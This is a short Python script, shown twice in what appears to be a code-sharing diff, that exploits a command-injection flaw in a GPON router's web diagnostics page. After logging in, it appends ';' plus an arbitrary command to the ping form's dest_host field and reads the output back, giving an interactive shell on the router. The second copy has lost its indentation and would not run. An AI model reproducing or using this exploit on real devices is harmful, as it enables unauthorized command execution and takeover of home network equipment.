epadillas · August 29, 2015 14:05
diff --git a/shell.py b/shell.py
 #!/usr/bin/python
 """
 Execute commands in the router by exploiting a vulnerability in its web interface.
 Set your credentials in the `conf` variable.
 """
 import requests
 import sys

 conf = {
    'username': 'TELMEX',
    'password': '<your WPA password>',
    'router'  : '192.168.1.254'
 }

 def read_user_cmd():
    while True:
        cmd = raw_input('root@' + conf['router'] + ':~$ ');
        if cmd == 'exit': sys.exit(0)
        if cmd == '': get_cmd_output()
        send_cmd(cmd)

 def login():
    login_form = 'http://' + conf['router'] + '/GponForm/LoginForm'
    login_data = {
        'username': conf['username'],
        'password': conf['password']
    }
    return s.post(login_form, login_data)

 def send_cmd(cmd):
    diagnostics_form = 'http://' + conf['router'] + '/GponForm/diag_XForm'
    diagnostics_data = {
        'XWebPageName': 'diag', 
        'diag_action' : 'ping', 
        'wan_conlist' : '0', 
        'dest_host'   : ';' + cmd, 
        'pinglength'  : '64', 
        'pingcount'   : '4'
    }
    return s.post(diagnostics_form, diagnostics_data)

 def get_cmd_output():
    diagnostics_page = 'http://' + conf['router'] + '/diag.html'
    r = s.get(diagnostics_page)
    print(find_between(r.text, 'diag_result = "', 'No traceroute test').decode('string_escape'))

 def find_between(s, first, last):
    try:
        start = s.index(first) + len(first)
        end = s.index(last, start)
        return s[start:end]
    except ValueError:
        return ""

 if __name__ == '__main__':
    s = requests.session()
    login()
    read_user_cmd()
	#!/usr/bin/python
	"""
	Execute commands in the router by exploiting a vulnerability in its web interface.
	Set your credentials in the `conf` variable.
	"""
	import requests
	import sys

	conf = {
	'username': 'TELMEX',
	'password': '<your WPA password>',
	'router' : '192.168.1.254'
	}

	def read_user_cmd():
	while True:
	cmd = raw_input('root@' + conf['router'] + ':~$ ');
	if cmd == 'exit': sys.exit(0)
	if cmd == '': get_cmd_output()
	send_cmd(cmd)

	def login():
	login_form = 'http://' + conf['router'] + '/GponForm/LoginForm'
	login_data = {
	'username': conf['username'],
	'password': conf['password']
	}
	return s.post(login_form, login_data)

	def send_cmd(cmd):
	diagnostics_form = 'http://' + conf['router'] + '/GponForm/diag_XForm'
	diagnostics_data = {
	'XWebPageName': 'diag',
	'diag_action' : 'ping',
	'wan_conlist' : '0',
	'dest_host' : ';' + cmd,
	'pinglength' : '64',
	'pingcount' : '4'
	}
	return s.post(diagnostics_form, diagnostics_data)

	def get_cmd_output():
	diagnostics_page = 'http://' + conf['router'] + '/diag.html'
	r = s.get(diagnostics_page)
	print(find_between(r.text, 'diag_result = "', 'No traceroute test').decode('string_escape'))

	def find_between(s, first, last):
	try:
	start = s.index(first) + len(first)
	end = s.index(last, start)
	return s[start:end]
	except ValueError:
	return ""

	if __name__ == '__main__':
	s = requests.session()
	login()
	read_user_cmd()